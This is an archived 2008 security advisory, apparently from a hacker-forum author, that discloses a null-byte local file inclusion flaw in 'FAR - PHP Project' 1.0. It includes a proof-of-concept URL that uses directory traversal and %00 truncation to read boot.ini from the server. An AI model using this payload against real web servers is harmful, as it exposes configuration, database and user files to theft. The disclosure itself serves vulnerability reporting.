Null Byte Local file Inclusion in FAR - PHP Project version:1.0

2008-08-21T00:00:00
ID SECURITYVULNS:DOC:20390
Type securityvulns
Reporter Securityvulns
Modified 2008-08-21T00:00:00

Description

. _ _ ._

| _/_ _| | _ \ _ \ | _/__

/ |\ \\_ \ |/ // \/ /\ \ / |/ \

/ // | / __ \| | \/ <\ \\ \/ \/ /_/ \ /

\_ |(/_| ||_ \\_>\ /\|\__\

\/ \/ \/

__ _ _

/ \ \/ __ \ \/ \/ /

\ \| | \/\ /\ /

\ >_| \ >\/\/

est.2007 \/ \/ forum.darkc0de.com

Web Application: FAR - PHP Project version:1.0

Vendor's Address :www.far-php.ro

Author: Beenu Arora Address: www.beenuarora.com

Python Dark Scripts: www.beenuarora.com/work.html

Date Found: 21/08/08

Severity: High

Security Risk:Null Byte Files Retrieval

Explaination:It is possible to view the contents of any file (e.g. databases, user information or

configuration files) on the web server (under the permission restrictions of the web server user)

POC: http://localhost/farver/index.php?c=/../../../../../../../../boot.ini%00

For the POC pic visit: www.beenuarora.com/POC.bmp


|Greetz: D3hydr8,rascal,rsauron,patrick,baltazar,sinner_01 and rest of team memebers. | |_____________|